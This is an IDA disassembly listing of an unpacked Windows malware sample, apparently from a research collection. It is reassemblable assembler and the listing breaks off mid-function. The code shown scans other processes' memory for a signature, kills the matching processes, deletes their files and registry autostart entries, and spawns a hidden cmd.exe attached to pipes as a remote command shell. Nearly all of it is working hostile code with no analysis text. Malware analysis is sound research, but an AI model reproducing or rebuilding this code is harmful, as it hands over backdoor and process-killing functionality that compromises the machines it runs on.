;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 68170571A9977C25E2CF1A063E4E0B38
; File Name : u:\work\68170571a9977c25e2cf1a063e4e0b38_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 00001000
; Flags C0000020: Text Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_data segment para public 'CODE' use32
assume cs:_data
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
loc_401495: ; DATA XREF: .data:0041AD00�o
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244:loc_401495�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp dword_41DDF4, 0FFFFFFFFh
jz short loc_40186E
push dword_41DDF4
call dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp dword_41DDE8, 0FFFFFFFFh
jz short loc_401883
push dword_41DDE8
call dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp dword_41DDEC, 0FFFFFFFFh
jz short loc_401898
push dword_41DDEC
call dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp dword_41DDF0, 0FFFFFFFFh
jz short loc_4018AD
push dword_41DDF0
call dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, dword_41DDFC
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, dword_41DDFC
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov dword_41DDFC, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov dword_41DDFC, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DDF0
call dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call dword_417074 ; GetCurrentProcess
push eax
call dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DE00
lea eax, [ebp+var_30C]
push eax
call dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov dword_41DDF4, eax
mov eax, [ebp+var_36C]
mov dword_41DDE8, eax
mov eax, [ebp+var_724]
mov dword_41DDEC, eax
push [ebp+var_720]
call dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push dword_41DDF4
call dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push dword_41DDEC
call dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
